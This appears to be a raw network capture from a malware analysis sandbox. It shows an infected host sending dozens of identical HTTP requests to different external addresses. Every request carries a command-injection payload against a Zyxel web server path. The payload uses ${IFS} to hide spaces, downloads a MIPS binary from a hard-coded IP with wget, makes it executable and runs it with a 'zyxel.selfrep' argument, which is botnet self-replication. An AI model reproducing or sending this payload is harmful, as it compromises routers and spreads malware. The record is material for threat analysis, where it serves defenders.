                                            Jan 14, 2024 15:50:54.712069988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8337192.168.2.235100683.50.61.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712100983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8338192.168.2.2341502155.1.243.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712147951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8339192.168.2.2339606176.118.81.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712214947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8340192.168.2.2349288101.141.243.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712245941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8341192.168.2.2342066165.92.182.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712294102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8342192.168.2.234439494.148.20.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712328911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8343192.168.2.233386465.143.27.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712347984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8344192.168.2.2357744163.48.129.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712412119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8345192.168.2.2344522180.149.238.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712445021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8346192.168.2.234945012.249.169.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712503910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8347192.168.2.2358852212.123.135.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712541103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8348192.168.2.234553823.174.44.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712603092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8349192.168.2.2337000145.100.181.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712631941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8350192.168.2.235021094.96.162.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712687969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8351192.168.2.2338692126.178.254.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712722063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8352192.168.2.2360356190.69.41.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712753057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8353192.168.2.233741081.86.104.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712796926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8354192.168.2.234056632.68.61.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712832928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8355192.168.2.2359202114.218.102.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712857008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8356192.168.2.234297051.68.20.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712927103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8357192.168.2.2348112131.71.14.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712980032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8358192.168.2.236067496.158.14.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713030100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8359192.168.2.235123087.135.247.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713048935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8360192.168.2.2339260121.16.28.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713113070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8361192.168.2.235248218.27.155.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713148117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8362192.168.2.2343228121.12.178.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713202000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8363192.168.2.23344725.126.156.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713246107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8364192.168.2.2348704223.27.250.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713278055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8365192.168.2.234720254.217.146.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713319063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8366192.168.2.23459189.56.246.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713356018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8367192.168.2.2336036209.51.163.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713391066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8368192.168.2.2360692170.57.22.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713434935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8369192.168.2.2343768205.139.111.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713466883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8370192.168.2.2332930120.26.149.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713534117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8371192.168.2.2357796115.68.64.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713563919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8372192.168.2.235329213.121.189.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713599920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8373192.168.2.2359520187.0.138.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713671923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8374192.168.2.2334152211.26.64.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713704109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8375192.168.2.2353876116.133.42.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713754892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8376192.168.2.234590635.46.252.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713773012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8377192.168.2.235848493.188.165.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713843107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8378192.168.2.2347720134.15.119.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713877916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8379192.168.2.2357618111.134.143.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713923931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8380192.168.2.234517271.57.216.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.713973045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8381192.168.2.2335242191.128.36.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714024067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8382192.168.2.235470078.125.64.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714057922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8383192.168.2.235095289.124.170.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714128017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8384192.168.2.235942625.254.100.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714169025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8385192.168.2.234544096.34.117.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714230061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8386192.168.2.234354283.111.250.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714255095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8387192.168.2.2335970137.36.236.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714293003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8388192.168.2.2334682101.123.113.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714381933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8389192.168.2.2354312155.181.65.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714411020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8390192.168.2.2333704217.93.184.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714441061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8391192.168.2.235129873.217.129.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714484930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8392192.168.2.23476869.126.254.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714523077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8393192.168.2.2352576170.62.190.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714551926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8394192.168.2.2349228117.33.172.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714622974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8395192.168.2.2356596101.90.76.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714669943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8396192.168.2.2345418213.212.200.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714711905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8397192.168.2.234808250.164.49.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714760065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8398192.168.2.2340226161.214.111.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.714797974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8399192.168.2.234632219.161.145.161443
                                            TimestampBytes transferredDirectionData
